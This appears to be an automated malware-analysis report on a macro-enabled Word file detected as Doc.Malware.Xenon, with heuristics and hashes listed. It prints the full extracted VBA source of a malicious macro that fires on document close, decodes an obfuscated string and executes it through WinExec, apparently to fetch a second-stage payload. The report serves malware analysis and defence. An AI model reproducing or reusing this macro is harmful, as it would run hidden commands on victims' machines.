Malware Insights
The file is an OOXML document containing VBA macros, as indicated by the 'OOXML_VBA' heuristic and the presence of 'macros.bas' and 'vbaProject_00.bin'. The VBA code includes a function 'rischio' that takes a string argument and calls 'orefice', and a subroutine 'flemma' that calls 'rischio' with a constructed string derived from 'privato()'. This suggests the macro is designed to execute arbitrary commands, likely downloading and running a second-stage payload. The ClamAV detection further confirms its malicious nature. The specific family is not identifiable from the provided evidence.
Heuristics 3
-
ClamAV: Doc.Malware.Xenon-10059125-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Xenon-10059125-0
-
VBA project inside OOXML medium OOXML_VBADocument contains a VBA project — VBA macros present
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4931 bytes |
SHA-256: 53e5246eb7222a476fdd060ed72f4d24906eca2eaced55cce3d4baa937e26c34 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
#If Win64 Then
Private Declare PtrSafe Function WinExec Lib "kernel32" (ByVal trachea As String, ByVal isolato As Long) As Long
#ElseIf Win32 Then
Private Declare Function WinExec Lib "kernel32" (ByVal trachea As String, ByVal isolato As Long) As Long
#End If
Public Function rischio(esaudire As String)
esaudire = Replace(esaudire, "", "")
Call orefice(esaudire)
End Function
Public Sub flemma()
Dim erba As String
Dim fanale As String
erba = "DCED"
fanale = privato()
Dim pitone As String
pitone = Trim("")
Dim nebulosa As Integer
nebulosa = Len("giove")
Dim merlo As String
merlo = tricheco(fanale, erba)
If nebulosa <> (0 + 1) Then
Application.Run "rischio", merlo
End If
End Sub
Public Function gallina(urgenza As Integer, pepita As Integer) As Integer
gallina = Int(urgenza - pepita - 1)
End Function
Public Function buca(snellire As String, indagine As Integer) As String
Dim simulato As Integer
Dim pendice As String
pendice = snellire
Dim botanico As Integer
botanico = 0
For simulato = (LenB(snellire) / 2) To indagine - 1
If botanico = (LenB(snellire) / 2) Then
botanico = 0
End If
pendice = pendice & Mid(snellire, botanico + 1, 1)
botanico = botanico + 1
Next
buca = pendice
End Function
Public Function atavico(registro As String)
Dim consumo As String
Dim parcella As Integer
consumo = "ABCDE"
Dim currentregistro As String
For parcella = 1 To 5
currentregistro = Mid(consumo, parcella, 1)
If currentregistro = RTrim(registro) Then
atavico = parcella - 1
End If
Next
End Function
Private Sub Document_Close()
If 2 = (1 + 1) Then
Application.Run "flemma"
End If
End Sub
Public Function tricheco(sbuffare As String, pianta As String) As String
Dim sonda As Integer
Dim truccato As Integer
Dim mordere As String
mordere = buca(pianta, Len(sbuffare))
pianta = mordere
Dim venato
Dim elsa As String
elsa = ""
Dim trachea As String
Dim insonnia As String
For venato = 1 To (LenB(sbuffare) / 2)
insonnia = Mid(pianta, venato, 1)
sonda = atavico(insonnia)
trachea = Mid(sbuffare, venato, 1)
truccato = Asc(trachea)
Dim slogatura As Integer
slogatura = gallina(truccato, sonda)
elsa = Chr(slogatura) + elsa + RTrim("")
Next
tricheco = elsa
End Function
Public Function orefice(vivanda As String)
Dim esaudire As String
esaudire = tricheco("gpi3izg", "DCEEDBBD")
Dim monastero As Integer
If Len(ActiveDocument.Content.Text) <> 2 Then
monastero = WinExec(StrReverse(vivanda + " " + esaudire), Len(""))
End If
End Function
Public Function privato()
Dim caduco As String
caduco = "3f%tszjvwkjpp#2rss%1"
caduco = caduco + "I{jg$E~tevx$1Ftqqdsh"
caduco = caduco + "$+Si{0Tfnhhx$V~wxhr2"
caduco = caduco + "Rhy2[hgGpljrx,3Hszsp"
caduco = caduco + "sdiJmoj,+kyxt=43hrf{"
caduco = caduco + "rgf~~} {2ftq3onpy2}g"
caduco = caduco + "|f3fen,0$'jrz=FTTGFX"
caduco = caduco + "E#0$+_X^WL3i|h,-?#Xx"
caduco = caduco + "euy1Tutgivx$(hsz>DUT"
caduco = caduco + "HDYE+_X^WL3i|h,?,Qj{"
caduco = caduco + "1Rgnify$W|xxip3Riw3["
caduco = caduco + "ieHpmhsx-1Is{qqsegXx"
caduco = caduco + "vlsk,*mxxs?33gte{qie"
caduco = caduco + "~} ~{1hsq2x2tkuCmgB|"
caduco = caduco + "g{h+->"
privato = caduco
End Function
Attribute VB_Name = "Module1"
Attribute VB_Name = "Module2"
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C811796E-C44D-420B-8914-A6429A7BC0CA}{D8BEC7BE-3F1E-4782-8AB0-B30430AD8A6A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{E53F80C3-7E4C-4BEE-9847-9D5D6F5162C8}{2EBD0471-B40B-44CC-9643-4B7F00223577}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 27648 bytes |
SHA-256: c3b26e3bc9b9da1d576fcb25e1575756b92d88713247387e12aa522b9d9febaf |
|||
|
Detection
ClamAV:
Doc.Malware.Xenon-10059125-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.